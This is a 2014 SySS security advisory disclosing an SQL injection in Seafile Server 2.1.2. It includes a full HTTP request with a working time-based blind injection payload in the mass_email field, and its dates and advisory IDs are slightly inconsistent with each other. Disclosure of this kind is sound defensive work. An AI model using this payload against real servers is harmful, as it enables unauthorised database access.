Advisory ID: SYSS-2014-001 Product: Seafile Server Community Edition Vendor: Seafile Ltd. Affected Version(s): until 2.1.2 Linux Tested Version(s): 2.1.2 Linux, 2.1.3 Linux Vulnerability Type: SQL Injection Risk Level: High Solution Status: None Vendor Notification: January, 2014 Solution Date: 2014-01-13 Public Disclosure: 2014-01-23 CVE Reference: Not assigned Author of Advisory: Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/ Document date: 2013-01-07 -------------------------------------------------------------------------------- Overview: The software suffers from at least one sql injection vulnerability. -------------------------------------------------------------------------------- Vulnerability Details: The script which handels requests to message/message_send/?from=user has an POST parameter called mass_email that is vulnerable to sql injection. (Fixed in version 2.1.3) -------------------------------------------------------------------------------- Proof of Concept (PoC): Request: +------------------------------------ POST /message/message_send/?from=user HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8000/user/2/msgs/ Content-Length: 120 Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq Connection: keep-alive Pragma: no-cache Cache-Control: no-cache mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss +------------------------------------ Effect: Response is delayed - if the value of mass_email is changed to victim%40sample.xy the answer is delivered almost instantly. The vulnerability could be verified using sqlmap [3]. -------------------------------------------------------------------------------- Solution: Update to version 2.1.3. -------------------------------------------------------------------------------- Disclosure Timeline: 2014-01-07 - Vulnerability discovered 2014-01-07 - Vulnerability reported to developer 2014-01-08 - Fix commited to github by developer 2014-01-11 - Information about fix sent to me by email 2014-01-13 - Verified fix -------------------------------------------------------------------------------- References: [1] SySS GmbH, SYSS-2013-002 - https://www.syss.de/advisories/SYSS-2014-001 - SQL-Injection in Seafile 2.1.2 Server [2] SySS GmbH, SySS Responsible Disclosure Policy - https://www.syss.de/responsible_disclosure_policy [3] http://sqlmap.org/ -------------------------------------------------------------------------------- Credits: Security vulnerability found by Responsible Hacker of the SySS GmbH. E-Mail: marcel.mangold@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc Key ID: AC15E5BE Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE -------------------------------------------------------------------------------- Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site [1]. -------------------------------------------------------------------------------- Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en